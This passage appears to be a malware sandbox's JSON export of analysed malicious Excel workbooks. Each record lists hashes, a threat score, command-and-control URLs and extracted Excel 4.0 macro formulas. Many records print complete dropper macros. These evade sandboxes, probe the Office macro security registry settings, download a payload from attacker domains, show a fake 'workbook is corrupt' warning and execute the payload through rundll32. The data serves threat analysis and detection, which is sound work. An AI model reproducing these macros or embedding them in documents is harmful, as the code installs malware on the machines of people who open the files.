255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"SKSpL4kzUQ\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"34790fe0a869f5ca9084f2f906b9b5d87a8a17a18b1e61c02d160e7319bc5340"},"analysis":{"reported":"2020-04-09T16:15:43Z","score":10},"files":[{"filename":"34790fe0a869f5ca9084f2f906b9b5d87a8a17a18b1e61c02d160e7319bc5340","filesize":147968,"md5":"334fbe7a025f2ff8ff9f108d8f4accab","sha1":"6a8f72cade5b2dd929bb97fb5ca6073ab76bf059","sha256":"34790fe0a869f5ca9084f2f906b9b5d87a8a17a18b1e61c02d160e7319bc5340","sha512":"050c76cda56630efdd576a201e09bd094b4124a368350200ab72b481af46f706b48d2c48e5cbc9a5e4da38511936f3130c6bb504f358f15abd69c6167e66f4c9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"34790fe0a869f5ca9084f2f906b9b5d87a8a17a18b1e61c02d160e7319bc5340.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"MN1jPJe5is\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"34846d439412445f3cc4ad28157193a92ce13d4a794c24ec1e4e23b3440eb103"},"analysis":{"reported":"2020-04-09T16:15:43Z","score":10},"files":[{"filename":"34846d439412445f3cc4ad28157193a92ce13d4a794c24ec1e4e23b3440eb103","filesize":152576,"md5":"cbe7b7fd94ed857af3083b78fcb2a435","sha1":"616119ca7ce39995aa5998b73d31e9fdcfc09249","sha256":"34846d439412445f3cc4ad28157193a92ce13d4a794c24ec1e4e23b3440eb103","sha512":"0bb01fd739f33d69036f6edb0a2bc6e9cac6cc7dcdfd66d9ab72c524a4696822ded5fcca3a27a15f95a4abac5cadd45943b18cce6ed4ae29448611b1a7b5740d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"34846d439412445f3cc4ad28157193a92ce13d4a794c24ec1e4e23b3440eb103.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"acnABB8sG5\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"348892d97484f075161fd8897425923589f33bf5288f0781377310ae54a4cd86"},"analysis":{"reported":"2020-04-09T16:15:43Z","score":10},"files":[{"filename":"348892d97484f075161fd8897425923589f33bf5288f0781377310ae54a4cd86","filesize":226304,"md5":"d2c735a21cd51b82cc97478f4ecd18cd","sha1":"d7a05a69c5155bb6da0a7bb39552c1216e04cf23","sha256":"348892d97484f075161fd8897425923589f33bf5288f0781377310ae54a4cd86","sha512":"30dab755a60b414e0766493bc0613370d41da612d54affc50e98061f0d82eb2be35e2f74b7fd9e8faa5aede16a7e4576423c5ad5c875d9b060be6a04fb9808ee","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"348892d97484f075161fd8897425923589f33bf5288f0781377310ae54a4cd86.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"QRsF3o8UV1\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"348d7e68df46c1bfa55b2f6cbf382c1b6c49bdc08012d28305b2fa3351e79034"},"analysis":{"reported":"2020-04-09T16:15:43Z","score":10},"files":[{"filename":"348d7e68df46c1bfa55b2f6cbf382c1b6c49bdc08012d28305b2fa3351e79034","filesize":112128,"md5":"f19d7cb4d0551ad21ce355f4d4035d3c","sha1":"4af830c8f1e7cf55be9d88358e5fa1e51cbd0e75","sha256":"348d7e68df46c1bfa55b2f6cbf382c1b6c49bdc08012d28305b2fa3351e79034","sha512":"df8f892ef101c9ca4d9bc9c92713af8479ffe63603e2f79636ec45b8503b96a5610c09c39414c2163133c13fe25c4c9f61a10193ade856ae263477a19c85ce5d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"348d7e68df46c1bfa55b2f6cbf382c1b6c49bdc08012d28305b2fa3351e79034.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"349832b831b5d6202d67caf925593561cc25e55261dba95a552d83b20bbd9d13"},"analysis":{"reported":"2020-04-09T16:15:43Z","score":10},"files":[{"filename":"349832b831b5d6202d67caf925593561cc25e55261dba95a552d83b20bbd9d13","filesize":141824,"md5":"3df7ffff8c1c163e179be191d70b17a7","sha1":"20c6d6b04184580457564062eaea65d467688fe1","sha256":"349832b831b5d6202d67caf925593561cc25e55261dba95a552d83b20bbd9d13","sha512":"ea0dc4de93f476fa59e5014847ce09aa6da3522264000bda3a60667ff8d37f637e3848792826b0112481c5aa292fb2be1ea4ceb6704e91c62ea76a9e6ab6438d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"349832b831b5d6202d67caf925593561cc25e55261dba95a552d83b20bbd9d13.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"QScoYmVQP7\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"34c15ce7dff8667cc7e5bae18e52f4aaa9ca2aca3471f7f71ebb92cbc05ba18e"},"analysis":{"reported":"2020-04-09T16:15:43Z","score":10},"files":[{"filename":"34c15ce7dff8667cc7e5bae18e52f4aaa9ca2aca3471f7f71ebb92cbc05ba18e","filesize":185344,"md5":"2ed96a1acaa354e0d768a8344f9f9b3f","sha1":"3607e5dcb2ce8bd0a61b736640b3eaa21db8ba78","sha256":"34c15ce7dff8667cc7e5bae18e52f4aaa9ca2aca3471f7f71ebb92cbc05ba18e","sha512":"101646293d37d19a6320b21a1ea337d297f433756b511529b1e282190efcdcebc1acc99fbc1e8820373a0140ffe7e2ae3771ed428d6cbf8e3b80eaf2e45b5b87","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"34c15ce7dff8667cc7e5bae18e52f4aaa9ca2aca3471f7f71ebb92cbc05ba18e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"34c3c81316b6a1dc0d8e71c1e6b2609f3bfd9f1dbe6a0e60a07395ed0c54eebd"},"analysis":{"reported":"2020-04-09T16:15:43Z","score":10},"files":[{"filename":"34c3c81316b6a1dc0d8e71c1e6b2609f3bfd9f1dbe6a0e60a07395ed0c54eebd","filesize":116224,"md5":"1ae59b8c83b14d7a0117545e659cfde3","sha1":"66608a0e20d8a05dfd2de6443876084ee65a3ae5","sha256":"34c3c81316b6a1dc0d8e71c1e6b2609f3bfd9f1dbe6a0e60a07395ed0c54eebd","sha512":"a7eb80b1288c7d04031f2c199739f31d7806fb175dcacb7b09d1e01077d057f1870c7807fa48dc95266d43b44a474029e672cd7d63742110bd9e7a97c43da601","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"34c3c81316b6a1dc0d8e71c1e6b2609f3bfd9f1dbe6a0e60a07395ed0c54eebd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8sg2IeTG69\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"34c5591a749636853aef4f9b3867560319d78ab530a332575fee88a85287dcfa"},"analysis":{"reported":"2020-04-09T16:15:43Z","score":10},"files":[{"filename":"34c5591a749636853aef4f9b3867560319d78ab530a332575fee88a85287dcfa","filesize":109568,"md5":"faf22eadf7d02c5eea99f038fb88c513","sha1":"45b70628faf8f70b349da4bb35caa7a16d75db05","sha256":"34c5591a749636853aef4f9b3867560319d78ab530a332575fee88a85287dcfa","sha512":"dbe16fec5766d8b82ca01a5c50ea2250aca96e0919ab47d84f5ab8633a37159c77d327a206ba6c9d519d4df9d6903fe85400bfddd236afe6511affb8e497d59c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"34c5591a749636853aef4f9b3867560319d78ab530a332575fee88a85287dcfa.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wgyafqtc.online/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),)\nIF(GET.WORKSPACE(14)\u003c381,CLOSE(FALSE),)\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"X3rESpfgDH\",TRUE)\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"34cbe4b9bb17a9055558b3bd1acdba744a6499aedcdf3e716ca138927a1d2747"},"analysis":{"reported":"2020-04-09T16:15:43Z","score":10},"files":[{"filename":"34cbe4b9bb17a9055558b3bd1acdba744a6499aedcdf3e716ca138927a1d2747","filesize":209920,"md5":"7fbdf0539c535df66deb8f99b9c97f72","sha1":"4c7a1fe06a4c19c2b6db6621e2f635cafa223c6d","sha256":"34cbe4b9bb17a9055558b3bd1acdba744a6499aedcdf3e716ca138927a1d2747","sha512":"81b68af36973dbb53f7f4dc34ff5188eedc31fb6e5a42bcf556600fe4a2de2dde71a1292fdb551de404d1e4aa0a0bacba00c51c814eea9a96b784c6aa6442f77","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"34cbe4b9bb17a9055558b3bd1acdba744a6499aedcdf3e716ca138927a1d2747.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Oo4TW0AAFW\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"34d1d528bd9bd6087e1edc4e4976dae3c084de48c17aafbcfa33dea6f1982e0b"},"analysis":{"reported":"2020-04-09T16:15:43Z","score":10},"files":[{"filename":"34d1d528bd9bd6087e1edc4e4976dae3c084de48c17aafbcfa33dea6f1982e0b","filesize":209920,"md5":"e3b82ead231b0f9dfd89e57bb4a4650e","sha1":"3ecb11c09e85acbbc74e7acf1991984e460c2963","sha256":"34d1d528bd9bd6087e1edc4e4976dae3c084de48c17aafbcfa33dea6f1982e0b","sha512":"8a604f0634c100c96636f5b6293372b0b2e6b0991350e69bba074bc40782ff5db95ee07d96c2b3fe7d099eb6b86364ffadacfa1477a8101595efd26fae6fc2f1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"34d1d528bd9bd6087e1edc4e4976dae3c084de48c17aafbcfa33dea6f1982e0b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"izoGvCQtyI\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"34fb32beea2d1058c1947de4c6f1a451b37785befd91b55e55abecbdb6bb95ff"},"analysis":{"reported":"2020-04-09T16:15:43Z","score":10},"files":[{"filename":"34fb32beea2d1058c1947de4c6f1a451b37785befd91b55e55abecbdb6bb95ff","filesize":112128,"md5":"c79b055762cdf07f5256f1b2584f016b","sha1":"ce1ec0a3894175255b1f095350ac0cb3c9b496d7","sha256":"34fb32beea2d1058c1947de4c6f1a451b37785befd91b55e55abecbdb6bb95ff","sha512":"82fa8d14f93f0bf9e4ae59e5290d896230cf924fe535de6c8772d6bdff2ee7d2f5d0c27915afb649605b04648585659271e49f278c25817548fe6527a2b2b573","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"34fb32beea2d1058c1947de4c6f1a451b37785befd91b55e55abecbdb6bb95ff.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"34fe36e75a6acca8b0dda255459d0f1da24a76f158473c99e22431f4a5116e35"},"analysis":{"reported":"2020-04-09T16:15:43Z","score":10},"files":[{"filename":"34fe36e75a6acca8b0dda255459d0f1da24a76f158473c99e22431f4a5116e35","filesize":185344,"md5":"4c5ec6ee7f43e2fbc502d6ad3ef3b3d0","sha1":"4ad9f51368a828f3f008d07575aa04f38251557a","sha256":"34fe36e75a6acca8b0dda255459d0f1da24a76f158473c99e22431f4a5116e35","sha512":"15b77d29dad1181d08456006d24e4b09b092b0609f75cdf9277fd36527335f465c6d56ed5b1866aa3353d9f5ab5a0c84460d34a3013beaf4e395147bebb18249","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"34fe36e75a6acca8b0dda255459d0f1da24a76f158473c99e22431f4a5116e35.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"350c9b0400c5bde0a98b95cd07b1d5c428d4fb1867b1b43e4b2d1c2838895266"},"analysis":{"reported":"2020-04-09T16:15:43Z","score":10},"files":[{"filename":"350c9b0400c5bde0a98b95cd07b1d5c428d4fb1867b1b43e4b2d1c2838895266","filesize":206336,"md5":"9e6b5b048bdef8d22016d4e8301f3dd4","sha1":"9106d03dd599f20f634f058a3db1256c7e71df1c","sha256":"350c9b0400c5bde0a98b95cd07b1d5c428d4fb1867b1b43e4b2d1c2838895266","sha512":"90729225c3e1524eb02ea595a593db911bc28405b0247e287e91aeb0c9f3a9d6222160f4e6561958f2031e3e45aaf06685d2b64dc4579c902cd743295ca47185","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"350c9b0400c5bde0a98b95cd07b1d5c428d4fb1867b1b43e4b2d1c2838895266.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"IhwnT7qQ9C\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"352608d628ac0c9a15b18f30e82b7ca6ca443981b3ab915fe1a59905df961808"},"analysis":{"reported":"2020-04-09T16:15:43Z","score":10},"files":[{"filename":"352608d628ac0c9a15b18f30e82b7ca6ca443981b3ab915fe1a59905df961808","filesize":120320,"md5":"9136241750dd156ea9c7c417c1cde152","sha1":"7de2267ac82eaac71f66ac38f0fbc90d8c32b5d9","sha256":"352608d628ac0c9a15b18f30e82b7ca6ca443981b3ab915fe1a59905df961808","sha512":"a5cd6f56a635a557dffda7260a7f531a6b9bba34b11a30114510b482c9f1ce89ccf1b86c205dbd3ba26552086408fe6c4f750e0e1527fa65d4b36ff25e7fb2b6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"352608d628ac0c9a15b18f30e82b7ca6ca443981b3ab915fe1a59905df961808.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"PeNXpVAySv\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3544edc10645462774a088281d272101e385b8d0f4714c397fb51234a8a3ac5c"},"analysis":{"reported":"2020-04-09T16:15:43Z","score":10},"files":[{"filename":"3544edc10645462774a088281d272101e385b8d0f4714c397fb51234a8a3ac5c","filesize":113664,"md5":"5eb9335ad51ed0a232cbbd9d3e62c7b1","sha1":"309ea1bbf9fbfe5517303d84901dba09878b8640","sha256":"3544edc10645462774a088281d272101e385b8d0f4714c397fb51234a8a3ac5c","sha512":"8bef522dfd4db2adc6846113b834e706e18e597d281749098b9407544e0afe7f5382511319a3900c31c4b4a27bbbbafc845917e5ad25164404128e30481dddd1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3544edc10645462774a088281d272101e385b8d0f4714c397fb51234a8a3ac5c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM 